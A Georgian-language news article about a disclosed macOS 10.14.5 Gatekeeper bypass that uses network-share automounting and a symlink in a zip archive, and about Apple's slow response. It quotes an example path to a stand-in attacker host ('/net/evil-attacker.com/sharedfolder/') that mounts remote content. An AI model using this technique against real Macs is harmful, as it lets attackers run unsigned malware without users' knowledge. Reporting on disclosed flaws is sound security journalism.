მავნე აპლიკაციის დაყენება Mac-ზე მარტივია. Apple-მა შეცდომა სამი თვის შემდეგაც არ გამოასწორა

უსაფრთხოების მკვლევარმა ფილიპო კავალარინმა თავის ბლოგზე გამოაქვეყნა გაფრთხილება macOS 10.14.5-ის შეცდომის შესახებ. ეს მოიცავს Gatekeeper-ის უსაფრთხოების ზომების სრულად გვერდის ავლით შესაძლებლობას. კავალარინის თქმით, მან შეცდომა Apple-ს უკვე მიმდინარე წლის თებერვალში მიანიშნა, მაგრამ კომპანიამ ის არ გაასწორა უახლეს განახლებაში.

Gatekeeper შეიმუშავა Apple-მა და პირველად ჩართო მის დესკტოპის ოპერაციულ სისტემაში 2012 წელს. ეს არის მექანიზმი, რომელიც ხელს უშლის აპლიკაციის გაშვებას მომხმარებლის ცოდნისა და თანხმობის გარეშე. აპლიკაციის ჩამოტვირთვის შემდეგ, Gatekeeper ავტომატურად ამოწმებს მის კოდს, რათა ნახოს, არის თუ არა პროგრამული უზრუნველყოფა სწორად ხელმოწერილი Apple-ის მიერ.

Ეს შეიძლება იყოს დაგაინტერესოთ

Mac

Apple-ის კომპიუტერები აღარ არის ისეთი უსაფრთხო. macOS მავნე პროგრამა სულ უფრო და უფრო გავრცელებული ხდება

ამაია ტომანი

0

თავის ბლოგ პოსტში, Cavallarin აცხადებს, რომ Gatekeeper, ნაგულისხმევად, მიიჩნევს როგორც გარე მეხსიერებას, ასევე ქსელის გაზიარებებს უსაფრთხო ადგილად. ამრიგად, ნებისმიერი აპლიკაცია, რომელიც მდებარეობს ამ სამიზნეებში, შეიძლება ავტომატურად გააქტიურდეს Gatekeeper-ის შემოწმების გარეშე. სწორედ ამ ფუნქციის გამოყენება შესაძლებელია მავნე პროგრამული უზრუნველყოფის გასაშვებად მომხმარებლის ცოდნის გარეშე.

ერთ-ერთი ასპექტი, რომელიც იძლევა არაავტორიზებული წვდომის საშუალებას არის ავტომატური დამაგრების ფუნქცია, რომელიც მომხმარებლებს საშუალებას აძლევს ავტომატურად დაამონტაჟონ ქსელის გაზიარება უბრალოდ „/net/“-ით დაწყებული ბილიკის მითითებით. მაგალითად, Cavallarin მოჰყავს გზას "ls /net/evil-attacker.com/sharedfolder/", რამაც შეიძლება გამოიწვიოს ოპერაციული სისტემის ჩატვირთვა "sharefolder" საქაღალდის შიგთავსის დისტანციურ ადგილას, რომელიც შეიძლება იყოს პოტენციურად მავნე.

თქვენ შეგიძლიათ უყუროთ როგორ მუშაობს მუქარა ვიდეოში:

კიდევ ერთი ფაქტორი არის ის ფაქტი, რომ თუ zip არქივი, რომელიც შეიცავს სპეციფიკურ სიმბოლურ ბმულს, რომელიც მიდის ავტომატური დამაგრების ფუნქციამდე, გაზიარებულია, ის არ შემოწმდება Gatekeeper-ის მიერ. ამ გზით, მსხვერპლს შეუძლია ადვილად ჩამოტვირთოთ მავნე არქივი და გაშალოს იგი, რაც საშუალებას აძლევს თავდამსხმელს, მომხმარებლის ცოდნის გარეშე გაუშვას Mac-ზე პრაქტიკულად ნებისმიერი პროგრამული უზრუნველყოფა. Finder-ს, რომელიც ნაგულისხმევად მალავს გარკვეულ გაფართოებებს, ასევე აქვს თავისი წილი ამ დაუცველობაში.

კავალარინი თავის ბლოგზე აცხადებს, რომ Apple-მა ყურადღება გაამახვილა macOS ოპერაციული სისტემის დაუცველობაზე მიმდინარე წლის 22 თებერვალს. მაგრამ მაისის შუა რიცხვებში Apple-მა შეწყვიტა ურთიერთობა Cavallarin-თან, ამიტომ Cavallarin-მა გადაწყვიტა მთელი საქმის გასაჯაროება.

წყარო: FCVL